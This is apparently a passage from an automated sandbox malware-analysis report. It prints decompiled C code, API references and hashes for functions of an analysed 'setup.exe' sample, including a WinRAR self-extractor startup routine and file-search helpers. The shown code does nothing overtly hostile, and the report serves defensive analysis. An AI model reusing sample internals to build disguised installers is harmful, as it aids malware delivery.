                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2949335588-0
                                                                                                                                                    • Opcode ID: 074ac401aa61f3b72e002fda194c0460998af5f2d2cb767c88b2323a46e33c10
                                                                                                                                                    • Instruction ID: dd5e55dcd5b12978db3a06ddd943f53a260f06867391cff2b85ace24c12abbd7
                                                                                                                                                    • Opcode Fuzzy Hash: 074ac401aa61f3b72e002fda194c0460998af5f2d2cb767c88b2323a46e33c10
                                                                                                                                                    • Instruction Fuzzy Hash: CC213D35A00615FFCB04DF95C484A9ABBB5FF4A321F108159E922AB351CB71A952CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00405DE2, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00405DE2(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t11;
				int _t13;
				int _t14;
				CHAR* _t16;
				CHAR* _t26;

				_t11 = lstrlenA(_a8);
				_t26 = _a4;
				_v8 = _t11;
				while(lstrlenA(_t26) >= _v8) {
					_t13 = _v8;
					 *((char*)(_t13 + _t26)) = 0;
					_t14 = lstrcmpiA(_t26, _a8);
					_t26[_v8] =  *((intOrPtr*)(_t13 + _t26));
					if(_t14 == 0) {
						_t16 = _t26;
					} else {
						_t26 = CharNextA(_t26);
						continue;
					}
					L5:
					return _t16;
				}
				_t16 = 0;
				goto L5;
			}









                                                                                                                                                    0x00405df2
                                                                                                                                                    0x00405df4
                                                                                                                                                    0x00405df7
                                                                                                                                                    0x00405e23
                                                                                                                                                    0x00405dfc
                                                                                                                                                    0x00405e06
                                                                                                                                                    0x00405e0a
                                                                                                                                                    0x00405e15
                                                                                                                                                    0x00405e18
                                                                                                                                                    0x00405e34
                                                                                                                                                    0x00405e1a
                                                                                                                                                    0x00405e21
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405e21
                                                                                                                                                    0x00405e2d
                                                                                                                                                    0x00405e31
                                                                                                                                                    0x00405e31
                                                                                                                                                    0x00405e2b
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                    • lstrcmpiA.KERNEL32(?,?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E0A
                                                                                                                                                    • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                    • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                    • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                    • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                    • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65AACF, Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,6E65AACB,00000000,00000004,6E65B07D,6E650A4D,6E650C09,6E626BFC,6E6289D2), ref: 6E65AADB
                                                                                                                                                    • TlsGetValue.KERNEL32(00000000,?,?,?,?,6E65AACB,00000000,00000004,6E65B07D,6E650A4D,6E650C09,6E626BFC,6E6289D2), ref: 6E65AAEF
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0000001C,?,?,?,?,6E65AACB,00000000,00000004,6E65B07D,6E650A4D,6E650C09,6E626BFC,6E6289D2), ref: 6E65AB09
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0000001C,?,?,?,?,6E65AACB,00000000,00000004,6E65B07D,6E650A4D,6E650C09,6E626BFC,6E6289D2), ref: 6E65AB14
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$Leave$EnterValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3969253408-0
                                                                                                                                                    • Opcode ID: 2b4d81e00a4f1c6011adafef7acdc71d6ca07a34ebaa88485e2b6df2ec40199b
                                                                                                                                                    • Instruction ID: 937261d45aefd4cfb67ac909970e4e6caf0ffde43f45d1d76260d1c6bf71008d
                                                                                                                                                    • Opcode Fuzzy Hash: 2b4d81e00a4f1c6011adafef7acdc71d6ca07a34ebaa88485e2b6df2ec40199b
                                                                                                                                                    • Instruction Fuzzy Hash: 44F0B436B44519BFDB605F96C888DABB76EEE463A07014115E852A7301D770E8218BF0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Analysis Process: setup.exe PID: 2172 Parent PID: 5356 setup.exeCOMMON

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 0122D42A, Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197filesleeptimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 16%
                                                                                                                                                    			E0122D42A(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a84, void* _a86, void* _a90, void* _a92, void* _a94, void* _a96, void* _a98, void* _a100, void* _a104, void* _a144, void* _a148, void* _a196) {
				char _v208;
				void* __ebx;
				void* __edi;
				void* _t41;
				void* _t42;
				long _t51;
				void* _t54;
				intOrPtr _t58;
				struct HWND__* _t74;
				void* _t75;
				WCHAR* _t94;
				struct HINSTANCE__* _t95;
				intOrPtr _t96;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t121;

				_t121 = __fp0;
				_t99 = __ebp;
				_t88 = __edx;
				E0122002D(__edx, 1);
				E01229D58("C:\Users\hardz\AppData\Local\Temp\sibEFF5.tmp\0", 0x800);
				E0122A2B3( &_v208); // executed
				E0122130F(0x12571e0);
				_t74 = 0;
				E0122F1A0(0x7104, 0x1265b78, 0, 0x7104);
				_t102 = _t101 + 0xc;
				_t94 = GetCommandLineW();
				_t106 = _t94;
				if(_t94 != 0) {
					_push(_t94);
					E0122BBC4(0, _t106);
					if( *0x1259471 == 0) {
						E0122D104(__eflags, _t94); // executed
					} else {
						_push(__ebp);
						_t100 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
						if(_t100 != 0) {
							UnmapViewOfFile(_t75);
							_t74 = 0;
						}
						CloseHandle(_t100);
						_pop(_t99);
					}
				}
				GetModuleFileNameW(_t74, 0x126cc88, 0x800);
				SetEnvironmentVariableW(L"sfxname", 0x126cc88); // executed
				GetLocalTime(_t102 + 0xc);
				_push( *(_t102 + 0x1a) & 0x0000ffff);
				_push( *(_t102 + 0x1c) & 0x0000ffff);
				_push( *(_t102 + 0x1e) & 0x0000ffff);
				_push( *(_t102 + 0x20) & 0x0000ffff);
				_push( *(_t102 + 0x22) & 0x0000ffff);
				_push( *(_t102 + 0x22) & 0x0000ffff);
				E01213FD6(_t102 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t102 + 0x24) & 0x0000ffff);
				_t103 = _t102 + 0x28;
				SetEnvironmentVariableW(L"sfxstime", _t103 + 0x7c);
				_t95 = GetModuleHandleW(_t74);
				 *0x124fed4 = _t95;
				 *0x124fed0 = _t95; // executed
				_t41 = LoadIconW(_t95, 0x64); // executed
				 *0x125b574 = _t41; // executed
				_t42 = E0122AD3D(0x12571e0, _t88, _t121); // executed
				 *0x1265b74 = _t42;
				E0121D25C(0x124fee8, _t88, _t99, 0x126cc88);
				E012287A5(0);
				E012287A5(0);
				 *0x1257458 = _t103 + 0x5c;
				 *0x125745c = _t103 + 0x30; // executed
				DialogBoxParamW(_t95, L"STARTDLG", _t74, E0122AE20, _t74); // executed
				 *0x125745c = _t74;
				 *0x1257458 = _t74;
				E01228863(_t103 + 0x24);
				E01228863(_t103 + 0x50);
				_t51 =  *0x126dc98;
				if(_t51 != 0) {
					Sleep(_t51);
				}
				if( *0x1258468 != 0) {
					E0122A4C4(0x126cc88);
				}
				E0121EA67(0x1265a70);
				if( *0x1257454 > 0) {
					L0123340E( *0x1257450);
				}
				DeleteObject( *0x125b574);
				_t54 =  *0x1265b74;
				if(_t54 != 0) {
					DeleteObject(_t54);
				}
				if( *0x124ff50 == 0 &&  *0x1257447 != 0) {
					E01216F5B(0x124ff50, 0xff);
				}
				_t55 =  *0x126dc9c;
				 *0x1257447 = 1;
				if( *0x126dc9c != 0) {
					E0122D163(_t55);
					CloseHandle( *0x126dc9c);
				}
				_t96 =  *0x124ff50; // 0x0
				if( *0x126dc91 != 0) {
					_t58 =  *0x124d5fc; // 0x3e8
					if( *0x126dc92 == 0) {
						__eflags = _t58;
						if(_t58 < 0) {
							_t96 = _t96 - _t58;
							__eflags = _t96;
						}
					} else {
						_t96 =  *0x126dc94;
						if(_t58 > 0) {
							_t96 = _t96 + _t58;
						}
					}
				}
				E0122A31B(_t103 + 0x1c); // executed
				return _t96;
			}





















                                                                                                                                                    0x0122d42a
                                                                                                                                                    0x0122d42a
                                                                                                                                                    0x0122d42a
                                                                                                                                                    0x0122d435
                                                                                                                                                    0x0122d444
                                                                                                                                                    0x0122d44d
                                                                                                                                                    0x0122d457
                                                                                                                                                    0x0122d461
                                                                                                                                                    0x0122d46a
                                                                                                                                                    0x0122d46f
                                                                                                                                                    0x0122d478
                                                                                                                                                    0x0122d47a
                                                                                                                                                    0x0122d47c
                                                                                                                                                    0x0122d47e
                                                                                                                                                    0x0122d47f
                                                                                                                                                    0x0122d48a
                                                                                                                                                    0x0122d4f7
                                                                                                                                                    0x0122d48c
                                                                                                                                                    0x0122d48c
                                                                                                                                                    0x0122d49f
                                                                                                                                                    0x0122d4a3
                                                                                                                                                    0x0122d4e4
                                                                                                                                                    0x0122d4ea
                                                                                                                                                    0x0122d4ea
                                                                                                                                                    0x0122d4ed
                                                                                                                                                    0x0122d4f3
                                                                                                                                                    0x0122d4f3
                                                                                                                                                    0x0122d48a
                                                                                                                                                    0x0122d508
                                                                                                                                                    0x0122d514
                                                                                                                                                    0x0122d51f
                                                                                                                                                    0x0122d52a
                                                                                                                                                    0x0122d530
                                                                                                                                                    0x0122d536
                                                                                                                                                    0x0122d53c
                                                                                                                                                    0x0122d542
                                                                                                                                                    0x0122d548
                                                                                                                                                    0x0122d55e
                                                                                                                                                    0x0122d563
                                                                                                                                                    0x0122d570
                                                                                                                                                    0x0122d57d
                                                                                                                                                    0x0122d582
                                                                                                                                                    0x0122d588
                                                                                                                                                    0x0122d58e
                                                                                                                                                    0x0122d594
                                                                                                                                                    0x0122d599
                                                                                                                                                    0x0122d5a4
                                                                                                                                                    0x0122d5a9
                                                                                                                                                    0x0122d5b2
                                                                                                                                                    0x0122d5bb
                                                                                                                                                    0x0122d5cb
                                                                                                                                                    0x0122d5da
                                                                                                                                                    0x0122d5df
                                                                                                                                                    0x0122d5e9
                                                                                                                                                    0x0122d5ef
                                                                                                                                                    0x0122d5f5
                                                                                                                                                    0x0122d5fe
                                                                                                                                                    0x0122d603
                                                                                                                                                    0x0122d60a
                                                                                                                                                    0x0122d60d
                                                                                                                                                    0x0122d60d
                                                                                                                                                    0x0122d61a
                                                                                                                                                    0x0122d61c
                                                                                                                                                    0x0122d61c
                                                                                                                                                    0x0122d626
                                                                                                                                                    0x0122d632
                                                                                                                                                    0x0122d63a
                                                                                                                                                    0x0122d63f
                                                                                                                                                    0x0122d646
                                                                                                                                                    0x0122d64c
                                                                                                                                                    0x0122d653
                                                                                                                                                    0x0122d656
                                                                                                                                                    0x0122d656
                                                                                                                                                    0x0122d663
                                                                                                                                                    0x0122d678
                                                                                                                                                    0x0122d678
                                                                                                                                                    0x0122d67d
                                                                                                                                                    0x0122d682
                                                                                                                                                    0x0122d68b
                                                                                                                                                    0x0122d68e
                                                                                                                                                    0x0122d699
                                                                                                                                                    0x0122d699
                                                                                                                                                    0x0122d6a6
                                                                                                                                                    0x0122d6ac
                                                                                                                                                    0x0122d6b5
                                                                                                                                                    0x0122d6ba
                                                                                                                                                    0x0122d6ca
                                                                                                                                                    0x0122d6cc
                                                                                                                                                    0x0122d6ce
                                                                                                                                                    0x0122d6ce
                                                                                                                                                    0x0122d6ce
                                                                                                                                                    0x0122d6bc
                                                                                                                                                    0x0122d6bc
                                                                                                                                                    0x0122d6c4
                                                                                                                                                    0x0122d6c6
                                                                                                                                                    0x0122d6c6
                                                                                                                                                    0x0122d6c4
                                                                                                                                                    0x0122d6ba
                                                                                                                                                    0x0122d6d4
                                                                                                                                                    0x0122d6e4

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0122002D: GetModuleHandleW.KERNEL32(kernel32), ref: 01220042
                                                                                                                                                      • Part of subcall function 0122002D: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 01220054
                                                                                                                                                      • Part of subcall function 0122002D: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 01220085
                                                                                                                                                      • Part of subcall function 01229D58: GetCurrentDirectoryW.KERNEL32(?,?), ref: 01229D60
                                                                                                                                                      • Part of subcall function 0122A2B3: OleInitialize.OLE32(00000000), ref: 0122A2CC
                                                                                                                                                      • Part of subcall function 0122A2B3: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0122A303
                                                                                                                                                      • Part of subcall function 0122A2B3: SHGetMalloc.SHELL32(01257430), ref: 0122A30D
                                                                                                                                                      • Part of subcall function 0122130F: GetCPInfo.KERNEL32(00000000,?), ref: 01221320
                                                                                                                                                      • Part of subcall function 0122130F: IsDBCSLeadByte.KERNEL32(00000000), ref: 01221334
                                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 0122D472
                                                                                                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0122D499
                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0122D4AA
                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0122D4E4
                                                                                                                                                      • Part of subcall function 0122D104: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0122D11A
                                                                                                                                                      • Part of subcall function 0122D104: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0122D156
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0122D4ED
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,0126CC88,00000800), ref: 0122D508
                                                                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxname,0126CC88), ref: 0122D514
                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 0122D51F
                                                                                                                                                    • _swprintf.LIBCMT ref: 0122D55E
                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0122D570
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0122D577
                                                                                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 0122D58E
                                                                                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AE20,00000000), ref: 0122D5DF
                                                                                                                                                    • Sleep.KERNEL32(?), ref: 0122D60D
                                                                                                                                                    • DeleteObject.GDI32 ref: 0122D646
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0122D656
                                                                                                                                                    • CloseHandle.KERNEL32 ref: 0122D699
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                                    • API String ID: 788466649-929546536
                                                                                                                                                    • Opcode ID: b5b5a11ef522826466ea03362b5a6df47ca14667b06d27546a668f840cd86da9
                                                                                                                                                    • Instruction ID: 198f08918ffa428379b6864d418bc6ebcd72ec28c9babf20b701ded9afd4bdd6
                                                                                                                                                    • Opcode Fuzzy Hash: b5b5a11ef522826466ea03362b5a6df47ca14667b06d27546a668f840cd86da9
                                                                                                                                                    • Instruction Fuzzy Hash: 3661B77556436ABFD331AFA6B88DB7F3BECEB54700F000419FA4992189DAB49844CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0121A534, Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                    			E0121A534(void* __edx, intOrPtr _a4, intOrPtr _a8, char _a32, short _a592, void* _a4692, WCHAR* _a4696, intOrPtr _a4700) {
				struct _WIN32_FIND_DATAW _v0;
				char _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _t43;
				signed int _t49;
				signed int _t63;
				void* _t65;
				long _t68;
				char _t69;
				signed int _t74;
				void* _t75;
				void* _t81;
				intOrPtr _t83;
				void* _t86;

				_t81 = __edx;
				E0122E1C0();
				_push(_t74);
				_t86 = _a4692;
				_t83 = _a4700;
				_t75 = _t74 | 0xffffffff;
				_push( &_v0);
				if(_t86 != _t75) {
					_t43 = FindNextFileW(_t86, ??);
					__eflags = _t43;
					if(_t43 == 0) {
						_t86 = _t75;
						_t63 = GetLastError();
						__eflags = _t63 - 0x12;
						_t11 = _t63 != 0x12;
						__eflags = _t11;
						 *((char*)(_t83 + 0x1044)) = _t63 & 0xffffff00 | _t11;
					}
					__eflags = _t86 - _t75;
					if(_t86 != _t75) {
						goto L13;
					}
				} else {
					_t65 = FindFirstFileW(_a4696, ??); // executed
					_t86 = _t65;
					if(_t86 != _t75) {
						L13:
						E0121FD96(_t83, _a4696, 0x800);
						_push(0x800);
						E0121BC3B(__eflags, _t83,  &_a32);
						_t49 = 0 + _a8;
						__eflags = _t49;
						 *(_t83 + 0x1000) = _t49;
						asm("adc ecx, 0x0");
						 *((intOrPtr*)(_t83 + 0x1008)) = _v24;
						 *((intOrPtr*)(_t83 + 0x1028)) = _v20;
						 *((intOrPtr*)(_t83 + 0x102c)) = _v16;
						 *((intOrPtr*)(_t83 + 0x1030)) = _v12;
						 *((intOrPtr*)(_t83 + 0x1034)) = _v8;
						 *((intOrPtr*)(_t83 + 0x1038)) = _v4;
						 *(_t83 + 0x103c) = _v0.dwFileAttributes;
						 *((intOrPtr*)(_t83 + 0x1004)) = _a4;
						E01220D79(_t83 + 0x1010, _t81,  &_v4);
						E01220D79(_t83 + 0x1018, _t81,  &_v24);
						E01220D79(_t83 + 0x1020, _t81,  &_v20);
					} else {
						if(E0121B5AC(_a4696,  &_a592, 0x800) == 0) {
							L4:
							_t68 = GetLastError();
							if(_t68 == 2 || _t68 == 3 || _t68 == 0x12) {
								_t69 = 0;
								__eflags = 0;
							} else {
								_t69 = 1;
							}
							 *((char*)(_t83 + 0x1044)) = _t69;
						} else {
							_t86 = FindFirstFileW( &_a592,  &_v0);
							if(_t86 != _t75) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t83 + 0x1040) =  *(_t83 + 0x1040) & 0x00000000;
				return _t86;
			}





















                                                                                                                                                    0x0121a534
                                                                                                                                                    0x0121a539
                                                                                                                                                    0x0121a53e
                                                                                                                                                    0x0121a541
                                                                                                                                                    0x0121a54d
                                                                                                                                                    0x0121a554
                                                                                                                                                    0x0121a55c
                                                                                                                                                    0x0121a55f
                                                                                                                                                    0x0121a5d2
                                                                                                                                                    0x0121a5d8
                                                                                                                                                    0x0121a5da
                                                                                                                                                    0x0121a5dc
                                                                                                                                                    0x0121a5de
                                                                                                                                                    0x0121a5e4
                                                                                                                                                    0x0121a5e7
                                                                                                                                                    0x0121a5e7
                                                                                                                                                    0x0121a5ea
                                                                                                                                                    0x0121a5ea
                                                                                                                                                    0x0121a5f0
                                                                                                                                                    0x0121a5f2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121a561
                                                                                                                                                    0x0121a568
                                                                                                                                                    0x0121a56e
                                                                                                                                                    0x0121a572
                                                                                                                                                    0x0121a5f8
                                                                                                                                                    0x0121a601
                                                                                                                                                    0x0121a606
                                                                                                                                                    0x0121a60d
                                                                                                                                                    0x0121a618
                                                                                                                                                    0x0121a618
                                                                                                                                                    0x0121a61c
                                                                                                                                                    0x0121a626
                                                                                                                                                    0x0121a629
                                                                                                                                                    0x0121a633
                                                                                                                                                    0x0121a63d
                                                                                                                                                    0x0121a647
                                                                                                                                                    0x0121a651
                                                                                                                                                    0x0121a65b
                                                                                                                                                    0x0121a665
                                                                                                                                                    0x0121a66f
                                                                                                                                                    0x0121a67c
                                                                                                                                                    0x0121a68c
                                                                                                                                                    0x0121a69c
                                                                                                                                                    0x0121a578
                                                                                                                                                    0x0121a58f
                                                                                                                                                    0x0121a5aa
                                                                                                                                                    0x0121a5aa
                                                                                                                                                    0x0121a5b3
                                                                                                                                                    0x0121a5c4
                                                                                                                                                    0x0121a5c4
                                                                                                                                                    0x0121a5bf
                                                                                                                                                    0x0121a5c1
                                                                                                                                                    0x0121a5c1
                                                                                                                                                    0x0121a5c6
                                                                                                                                                    0x0121a591
                                                                                                                                                    0x0121a5a4
                                                                                                                                                    0x0121a5a8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121a5a8
                                                                                                                                                    0x0121a58f
                                                                                                                                                    0x0121a572
                                                                                                                                                    0x0121a6a1
                                                                                                                                                    0x0121a6b4

                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0121A42F,000000FF,?,?), ref: 0121A568
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0121A42F,000000FF,?,?), ref: 0121A59E
                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0121A42F,000000FF,?,?), ref: 0121A5AA
                                                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,0121A42F,000000FF,?,?), ref: 0121A5D2
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0121A42F,000000FF,?,?), ref: 0121A5DE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 869497890-0
                                                                                                                                                    • Opcode ID: 688cacd2cc48a3379b39eea24a9863028652e80e6f982a320007daf0717bd49c
                                                                                                                                                    • Instruction ID: 3a19cedafdc3b85648ae1f96715196bce7a5d9a72c459242a384bbe481e43d80
                                                                                                                                                    • Opcode Fuzzy Hash: 688cacd2cc48a3379b39eea24a9863028652e80e6f982a320007daf0717bd49c
                                                                                                                                                    • Instruction Fuzzy Hash: EE418376519682AFC325DF28D884AEEF7E8FF58350F000A29F6A9D3244D734A954CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01237363, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E01237363(int _a4) {
				void* _t14;
				void* _t16;

				if(E0123A6B6(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E012373E8(_t14, _t16, _a4);
				ExitProcess(_a4);
			}





                                                                                                                                                    0x0123736f
                                                                                                                                                    0x0123738b
                                                                                                                                                    0x0123738b
                                                                                                                                                    0x01237394
                                                                                                                                                    0x0123739d

                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,01237339,?,0124AAB8,0000000C,01237490,?,00000002,00000000), ref: 01237384
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,01237339,?,0124AAB8,0000000C,01237490,?,00000002,00000000), ref: 0123738B
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0123739D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                    • Opcode ID: c156d0fa7ca3948d8053ed56943ecc9155001fd4d9916671c487c98e5e84c244
                                                                                                                                                    • Instruction ID: e61b7669790eb293bf932e83389a5dab016218da208544c43e1ef459cb86faf3
                                                                                                                                                    • Opcode Fuzzy Hash: c156d0fa7ca3948d8053ed56943ecc9155001fd4d9916671c487c98e5e84c244
                                                                                                                                                    • Instruction Fuzzy Hash: 98E046B9010209EFCF216F26E90DA583B6AEFA1241B004010FE499B121CB35D842DB90
                                                                                                                                                    Uniqueness

